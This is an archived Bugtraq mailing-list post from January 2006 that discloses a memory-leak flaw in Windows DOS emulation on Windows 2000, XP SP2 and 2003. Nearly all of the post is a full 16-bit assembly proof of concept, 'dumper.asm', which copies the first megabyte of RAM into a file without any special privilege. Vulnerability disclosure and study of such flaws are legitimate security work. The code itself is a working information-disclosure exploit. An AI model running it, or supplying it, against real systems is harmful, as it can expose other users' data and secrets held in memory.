[42456] in bugtraq
Windows mem leakage
daemon@ATHENA.MIT.EDU (endrazine@pulltheplug.org)
Thu Jan 26 14:27:47 2006
Message-ID: <1802.195.68.104.22.1138104113.squirrel@mail.pulltheplug.org>
Date: Tue, 24 Jan 2006 04:01:53 -0800 (PST)
From: endrazine@pulltheplug.org
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Desc : Windows Dos emulation allows dumping of first 1 Mo of RAM (with no
particular privilege).
Tested under : Win 2000, XP SP2, 2003
Code :
;---------------- [ dumper.asm ]-----------------------------------------
; Dump first 1 Mo of memory under any MS product
; 1 Mo is the maximum quantity of accessible memory
; in real mode using 16b OSes.
;
; endrazine, last update : 30/12/2005
;
;-------------------------------------------------------------------------
code segment
org 100h
assume ds:code, es:code, cs:code
xor ax,ax
mov si,ax
start:
mov ah, 09h
mov dx,offset welcome
int 21h
xor ax,ax ;Wait until key pressed
int 16h
mov ah, 3ch ; MS DOS Create file Function
mov dx, offset fname
xor cx,cx
int 21h
mov ax, 3d01h ; MS DOS Open file Function
int 21h
mov handle,ax
xor ax,ax
mov ds,ax
mov myds,ds
mov cx,32
dabigloop:
push cx
xor ax,ax
mov si,ax
;==destination==
mov di,offset buffer
mov es,cs
;==compteur==
mov cx,16384
;==copy==
rep movsw
mov ds,cs
xor ax,ax
mov ah, 40h
mov bx,handle
mov cx,32768; +10
mov dx, offset buffer
int 21h
mov ax,myds
;add ax,2047 ;repeat last 16b
add ax,2048
mov myds,ax
mov ds,ax
pop cx
loop dabigloop
mov ax,4ch ; Quit
int 21h
myds dw ?
handle dw ?
welcome db '[ Raw Dos Memory Dumper ]',10,13
db '',10,13
db '[ coded by endrazine ]',10,13
db '',10,13
db '[ Dumping First Memory chunk to Dump.txt ]',10,13
db 'Press any key$',10,13
fname db 'Dump.txt',0
buffer db 32768 dup ?
some_canari_separator db '//////////',0
end start
end
;------------------------------------------------------------------------
Endrazine-
